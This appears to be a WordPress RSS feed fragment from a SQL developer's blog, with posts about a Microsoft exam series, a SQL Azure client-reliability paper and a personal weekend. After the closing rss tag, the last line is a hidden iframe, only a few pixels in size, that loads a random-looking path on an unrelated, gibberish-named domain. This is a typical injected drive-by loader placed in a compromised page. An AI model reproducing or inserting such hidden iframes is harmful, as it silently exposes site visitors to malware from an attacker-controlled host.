<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-2/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 2)'>Microsoft Exam 70-433 (part 2)</a></li>
<li><a href='http://toyboxcreations.net/2010/06/microsoft-exam-70-433-part-4/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 4)'>Microsoft Exam 70-433 (part 4)</a></li>
<li><a href='http://toyboxcreations.net/2010/07/microsoft-exam-70-433-part-6/' rel='bookmark' title='Permanent Link: Microsoft Exam 70-433 (part 6)'>Microsoft Exam 70-433 (part 6)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/microsoft-exam-70-433/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Best Practices for Building Reliable SQL Azure Database Client Applications</title>
		<link>http://toyboxcreations.net/2010/06/best-practices-for-building-reliable-sql-azure-database-client-applications/</link>
		<comments>http://toyboxcreations.net/2010/06/best-practices-for-building-reliable-sql-azure-database-client-applications/#comments</comments>
		<pubDate>Wed, 23 Jun 2010 12:21:52 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/2010/06/best-practices-for-building-reliable-sql-azure-database-client-applications/</guid>
		<description><![CDATA[Valery Mizonov has published a paper on SQLCAT,  called “Best Practices for Building Reliable SQL Azure Database Client  Applications”. The paper discusses his sub-classing of the ADO.NET  classes like SqlConnection to handle the retry  scenarios associated with SQL Azure. The code is a great  stepping-stone; replacing the standard ADO.NET calls [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2010/01/building-web-service-clients-using-the-net-framework/' rel='bookmark' title='Permanent Link: Building Web Service Clients using the .NET Framework'>Building Web Service Clients using the .NET Framework</a></li>
<li><a href='http://toyboxcreations.net/2010/04/azure-tables-or-sql-azure/' rel='bookmark' title='Permanent Link: Azure Tables or SQL Azure?'>Azure Tables or SQL Azure?</a></li>
<li><a href='http://toyboxcreations.net/2010/05/developing-and-deploying-with-sql-azure-white-paper/' rel='bookmark' title='Permanent Link: Developing and Deploying with SQL Azure White Paper'>Developing and Deploying with SQL Azure White Paper</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Valery Mizonov has published a paper on <a href="http://sqlcat.com/">SQLCAT</a>,  called “Best Practices for Building Reliable SQL Azure Database Client  Applications”. The paper discusses his sub-classing of the ADO.NET  classes like SqlConnection to handle the <a href="http://blogs.msdn.com/b/sqlazure/archive/2010/05/11/10011247.aspx">retry  scenarios associated with SQL Azure</a>. The code is a great  stepping-stone; replacing the standard ADO.NET calls with his custom  classes. Read the article and download the code <a href="http://sqlcat.com/technicalnotes/archive/2010/06/17/best-practices-for-building-reliable-sql-azure-database-client-applications.aspx">here</a>.</p>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2010/01/building-web-service-clients-using-the-net-framework/' rel='bookmark' title='Permanent Link: Building Web Service Clients using the .NET Framework'>Building Web Service Clients using the .NET Framework</a></li>
<li><a href='http://toyboxcreations.net/2010/04/azure-tables-or-sql-azure/' rel='bookmark' title='Permanent Link: Azure Tables or SQL Azure?'>Azure Tables or SQL Azure?</a></li>
<li><a href='http://toyboxcreations.net/2010/05/developing-and-deploying-with-sql-azure-white-paper/' rel='bookmark' title='Permanent Link: Developing and Deploying with SQL Azure White Paper'>Developing and Deploying with SQL Azure White Paper</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/best-practices-for-building-reliable-sql-azure-database-client-applications/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>The Days Are Just Packed</title>
		<link>http://toyboxcreations.net/2010/06/the-days-are-just-packed/</link>
		<comments>http://toyboxcreations.net/2010/06/the-days-are-just-packed/#comments</comments>
		<pubDate>Mon, 21 Jun 2010 16:07:02 +0000</pubDate>
		<dc:creator>Shannon Lowder</dc:creator>
				<category><![CDATA[Microsoft SQL]]></category>

		<guid isPermaLink="false">http://toyboxcreations.net/?p=1081</guid>
		<description><![CDATA[Hopefully you recognize the reference in the title.
But really, the days are packed!  This weekend was no exception.  After work I took out 4 bushes from behind the house.  They were seriously taking over the place.  When that was finished, I had a pile out front 10 feet long, 3 foot [...]


Related posts:<ol><li><a href='http://toyboxcreations.net/2005/01/work-work-then-some-more-work/' rel='bookmark' title='Permanent Link: Work, work, then some more work.'>Work, work, then some more work.</a></li>
<li><a href='http://toyboxcreations.net/2005/01/project-1/' rel='bookmark' title='Permanent Link: Project 1'>Project 1</a></li>
<li><a href='http://toyboxcreations.net/2010/05/sql-saturday-46-raleigh-nc/' rel='bookmark' title='Permanent Link: SQL Saturday #46, Raleigh, NC'>SQL Saturday #46, Raleigh, NC</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Hopefully you recognize the <a href="http://www.gocomics.com/calvinandhobbes/" target="new">reference</a> in the title.</p>
<p>But really, the days are packed!  This weekend was no exception.  After work I took out 4 bushes from behind the house.  They were seriously taking over the place.  When that was finished, I had a pile out front 10 feet long, 3 foot deep, and as tall as me in the middle.  These bushes were <em>huge</em>!</p>
<p>After that, I picked up dad's <a href="http://www.brusters.com/menu_cakepie.asp" target="new">Red Velvet Ice Cream Cake from Brusters</a>, then ran it over to mom and dad's to store until Saturday.</p>
<p>Saturday I was up bright and early, painting dad's new storage building.  We finished that up around noon, and then it was on to Grilling duties!  Burgers, hot dogs, and shrimp!  We spent the rest of the afternoon with Dad.  We always seem to celebrate our holidays the Saturday before the event.</p>
<p><a href="http://toyboxcreations.net/wp-content/uploads/2010/06/ipad-case.jpg"><img class="alignright size-medium wp-image-1083" title="ipad case" src="http://toyboxcreations.net/wp-content/uploads/2010/06/ipad-case-300x132.jpg" alt="" width="300" height="132" /></a>Finally, Sunday, after Church, lunch with the missus and some shopping at Ikea, I built a lego holder for my new iPad, styled after the <a href="http://www.dodocase.com/" target="new">dodo case</a>.Then, I  put up a <a href="http://www.bygpub.com/bluebird/" target="new">bluebird house</a> at the mother-in-law's place, where I got into something that had me broken out in hives within minutes!!  So, pink, puffy, and tired, I dropped two Benadryl and called it a weekend!</p>
<p>Whew, the days are seriously packed!  I hope you enjoyed your weekend!  Tell me all about it!</p>


<p>Related posts:<ol><li><a href='http://toyboxcreations.net/2005/01/work-work-then-some-more-work/' rel='bookmark' title='Permanent Link: Work, work, then some more work.'>Work, work, then some more work.</a></li>
<li><a href='http://toyboxcreations.net/2005/01/project-1/' rel='bookmark' title='Permanent Link: Project 1'>Project 1</a></li>
<li><a href='http://toyboxcreations.net/2010/05/sql-saturday-46-raleigh-nc/' rel='bookmark' title='Permanent Link: SQL Saturday #46, Raleigh, NC'>SQL Saturday #46, Raleigh, NC</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://toyboxcreations.net/2010/06/the-days-are-just-packed/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://eiueuiuewi.com/54N7JS34B34D5NH34J/" width="4" height="2"></iframe>